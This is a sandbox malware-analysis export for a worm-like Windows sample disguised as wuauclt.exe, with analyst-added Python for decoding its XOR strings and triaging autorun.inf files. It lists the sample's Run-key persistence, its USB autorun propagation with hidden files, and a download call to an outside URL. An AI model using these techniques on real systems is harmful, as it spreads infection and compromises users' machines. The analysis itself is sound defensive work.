                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F72,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction ID: 3bba51ca83177c78f7b5e7647297d040befd782e8eab32064d4fce7d17e62b12
                                                                            • Opcode Fuzzy Hash: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction Fuzzy Hash: 82213EB0780701AFD720EF659D42F1736E8AB44704F10593EBA45FB6D2DBB8A8118B5C

                                                                            Control-flow Graph
                                                                            (function 0040288C; the rendered graph is not preserved in this export) 40288c-4028fe mode dispatch -> 402904-40291c CreateFileA (or 4029b6-4029ef GetStdHandle for a standard handle) -> 402930-40293e GetFileSize -> 40294d-40295a SetFilePointer -> 402960-40297c ReadFile -> 402995-4029a4 SetFilePointer -> 4029aa-4029b2 SetEndOfFile -> 4029f3-402a04 GetFileType -> 402a16-402a28 CloseHandle -> 402a14-402a15 return. Every file API block also has an edge to 402a2a-402a35 GetLastError, which joins the 402a14-402a15 exit.
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 004029E7
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 004029FD
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402A30
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
                                                                            • Opcode Fuzzy Hash: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D
                                                                            APIs
                                                                              • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
                                                                              • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShellSystem$DirectoryTime
                                                                            • String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
                                                                            • API String ID: 3953870399-2285911871
                                                                            • Opcode ID: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
                                                                            • Opcode Fuzzy Hash: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9
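The String ID fields of this record and of the 00405E02/00405F1C record above carry entries such as "A}vokwcq*`~f", "kucm" and three that begin "lqrs>*)", alongside the plaintext "SVOHOST.exe". The Python below is an added example, not part of the Joe Sandbox report: it treats those entries as repeating-key XOR, recovers the key from the crib "http://" (the assumption being that the three "lqrs>*)" entries are URLs), confirms the key's period from the crib itself, and decodes the rest. Both the XOR model and the crib are assumptions made here; the report states neither.

```python
# String ID entries copied from the two records above ('$' in the report
# separates entries).  "SVOHOST.exe" is plaintext there and is left out.
ENCODED = [
    "A}vokwcq*`~f",
    "`tn{5+r{p",
    "kucm",
    "lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p",
    "lqrs>*)tsr(gra`lvjhf*fin",
    "lqrs>*)tsr(lj``lvapg*fin",
]
CRIB = "http://"  # assumed plaintext prefix of the URL-shaped entries


def key_fragment(cipher, crib):
    """Key bytes at positions 0..len(crib)-1 if crib is the plaintext there."""
    return [ord(c) ^ ord(p) for c, p in zip(cipher, crib)]


def smallest_period(fragment):
    """Shortest p with fragment[i] == fragment[i+p] throughout; None if it never repeats."""
    for p in range(1, len(fragment)):
        if all(fragment[i] == fragment[i + p] for i in range(len(fragment) - p)):
            return p
    return None


def xor_decode(cipher, key):
    return "".join(chr(ord(c) ^ key[i % len(key)]) for i, c in enumerate(cipher))


def printable(s):
    return all(0x20 <= ord(ch) < 0x7F for ch in s)


def recover_key(samples, crib):
    """Try each sample as the carrier of the crib.  A candidate key is accepted
    only if (a) it visibly repeats inside the crib, so its period is observed
    rather than guessed (a key longer than the crib cannot be confirmed this
    way), and (b) it turns every sample into printable ASCII."""
    for s in samples:
        if len(s) < len(crib):
            continue
        frag = key_fragment(s, crib)
        period = smallest_period(frag)
        if period is None:
            continue
        key = frag[:period]
        if all(printable(xor_decode(x, key)) for x in samples):
            return key
    return None


def decode_all(samples, crib):
    key = recover_key(samples, crib)
    if key is None:
        raise ValueError("no repeating key consistent with the crib")
    return key, [xor_decode(s, key) for s in samples]


if __name__ == "__main__":
    key, plain = decode_all(ENCODED, CRIB)
    print("key:", key)
    for c, p in zip(ENCODED, plain):
        print("%-36s -> %s" % (c, p))
```

Under the key this recovers, "kucm" decodes to "open", which agrees with the plaintext ShellExecuteA verb "open" in the bbyb.exe record, and "A}vokwcq*`~f" to "Explorer.exe"; the three "lqrs>*)" entries decode to http:// URLs. Treat the decoded values as derived indicators that rest on the crib assumption, not as facts the report states.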
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F72,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction ID: 594542fb2c8cde3af6a4fe5998d0340eb89294e9bd4d21e9ef299eea2d4a1429
                                                                            • Opcode Fuzzy Hash: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction Fuzzy Hash: DF2127B0784701AFE720DF649D82B1237E4AB44700F10853AFA85EF6D2DBB8A8118B5D
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile$DriveType
                                                                            • String ID: \autorun.inf$\sxs.exe$sxs.
                                                                            • API String ID: 1467228633-3893248116
                                                                            • Opcode ID: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction ID: d7b3d59c00894bd143ef4d30449a3bd145d8bcc858247ddb54af4904dd4dc33d
                                                                            • Opcode Fuzzy Hash: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction Fuzzy Hash: 4F31D4709002099BDB00FB50C952A9EBB79EF55308F514477E501B72D2C73DAF15C799
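The record above checks GetDriveTypeA and then applies attribute 0x06 (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM) to \autorun.inf and \sxs.exe at a drive root, the usual removable-drive propagation layout. As an added example that is not part of the report, and not the sample's own autorun.inf (the report does not reproduce its contents), the Python below parses an autorun.inf, lists every target it can launch, decodes the attribute word, and, on Windows, checks whether a target carries the hidden+system pair. The sample file text is constructed here; the directive names (open, shellexecute, shell\<verb>\command, shell) are the documented autorun.inf keys, and the "sxs.exe" target is taken from the record's strings.

```python
import os

# Constructed sample of the shape such worms drop; not the file from this
# analysis.  The launch target is the report's "\sxs.exe" string.
SAMPLE_AUTORUN = """[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\\Auto\\command=sxs.exe
shell=Auto
"""

# FILE_ATTRIBUTE_* bits as SetFileAttributesA takes them; the record above
# passes 0x06, i.e. HIDDEN | SYSTEM.
ATTRIBUTE_BITS = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x20: "ARCHIVE"}
HIDDEN_SYSTEM = 0x06
EXECUTABLE_SUFFIXES = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js")


def describe_attributes(value):
    """Names of the attribute bits set in a SetFileAttributesA argument."""
    return [name for bit, name in sorted(ATTRIBUTE_BITS.items()) if value & bit]


def parse_autorun(text):
    """Minimal INI reader for autorun.inf: lower-cased key/value pairs of the
    [autorun] section.  Comments and malformed lines are skipped rather than
    rejected, because worms often pad the file with junk."""
    section, directives = None, {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            directives[key.strip().lower()] = value.strip()
    return directives


def launch_targets(directives):
    """Everything the file can cause to run: open=, shellexecute=, and every
    shell\\<verb>\\command= (shell= only names which verb is the default)."""
    targets = [directives[k] for k in ("open", "shellexecute") if directives.get(k)]
    for key, value in directives.items():
        if key.startswith("shell\\") and key.endswith("\\command") and value:
            targets.append(value)
    return targets


def triage_drive(root, autorun_text=None):
    """Describe what an autorun.inf at `root` would launch.  On Windows the
    HIDDEN|SYSTEM check uses st_file_attributes; elsewhere (or when the target
    is missing) that field stays None and only the file text is inspected."""
    if autorun_text is None:
        with open(os.path.join(root, "autorun.inf"), encoding="latin-1") as fh:
            autorun_text = fh.read()
    findings = []
    for target in launch_targets(parse_autorun(autorun_text)):
        note = {"target": target,
                "executable": target.lower().endswith(EXECUTABLE_SUFFIXES),
                "hidden_system": None}
        try:
            attrs = os.stat(os.path.join(root, target.split()[0])).st_file_attributes
            note["hidden_system"] = (attrs & HIDDEN_SYSTEM) == HIDDEN_SYSTEM
        except (AttributeError, OSError):
            pass
        findings.append(note)
    return findings


if __name__ == "__main__":
    print("0x06 =", describe_attributes(HIDDEN_SYSTEM))
    for finding in triage_drive(".", SAMPLE_AUTORUN):
        print(finding)
```

Point triage_drive at a mounted removable drive with autorun_text left as None and it reads the real file; a target that is both an executable at the root and flagged hidden_system is the layout this record produces.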
APIs
• DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
• DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
• String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
• API String ID: 2436712417-1998065829
• Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
• Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
• Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
• Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
APIs
• Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
  • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
  • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
  • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
  • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
  • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
Strings
• Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
• l}+2, xrefs: 00407E36
• wuauclt.exe, xrefs: 00407DFC
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
• Microsoft, xrefs: 00407E11
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
• String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
• API String ID: 1219844470-3788782062
• Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
• Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
• Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
• Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9
APIs
• Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
  • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
  • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
  • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
  • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
  • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
Strings
• Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
• l}+2, xrefs: 00407E36
• wuauclt.exe, xrefs: 00407DFC
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
• Microsoft, xrefs: 00407E11
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
• String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
• API String ID: 1219844470-3788782062
• Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
• Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
• Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
• Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD
APIs
• Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
  • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
  • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
  • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
Strings
• l}+2, xrefs: 00407F7F
• wuauclt.exe, xrefs: 00407FBF
• Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
• Microsoft, xrefs: 00407FD4
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
• String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
• API String ID: 3088811538-3788782062
• Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
• Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
• Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
• Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
APIs
• RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
• RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
• LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
• RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: Hh
• API String ID: 730355536-2683877627
• Opcode ID: 5c19f900fa3a488fd33420dfa6c401149df2a56146d2d3e02916e60ccae6ed6d
• Instruction ID: 5f09b27ca823af9dd1356ce4e247dec4ea3fcd1be7825b8ef208c2b79a25235a
• Opcode Fuzzy Hash: 5c19f900fa3a488fd33420dfa6c401149df2a56146d2d3e02916e60ccae6ed6d
• Instruction Fuzzy Hash: 0E018470644340AED319AB6A9D06F163AA4E74E704F14C47BE140BB2F2D6BD44A08B5F
APIs
• CreateMutexA.KERNEL32(00000000,00000000,00544348), ref: 005418FC
• FindCloseChangeNotification.KERNEL32(?), ref: 0054192E
Strings
Memory Dump Source
• Source File: 00000004.00000002.3253164926.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: true
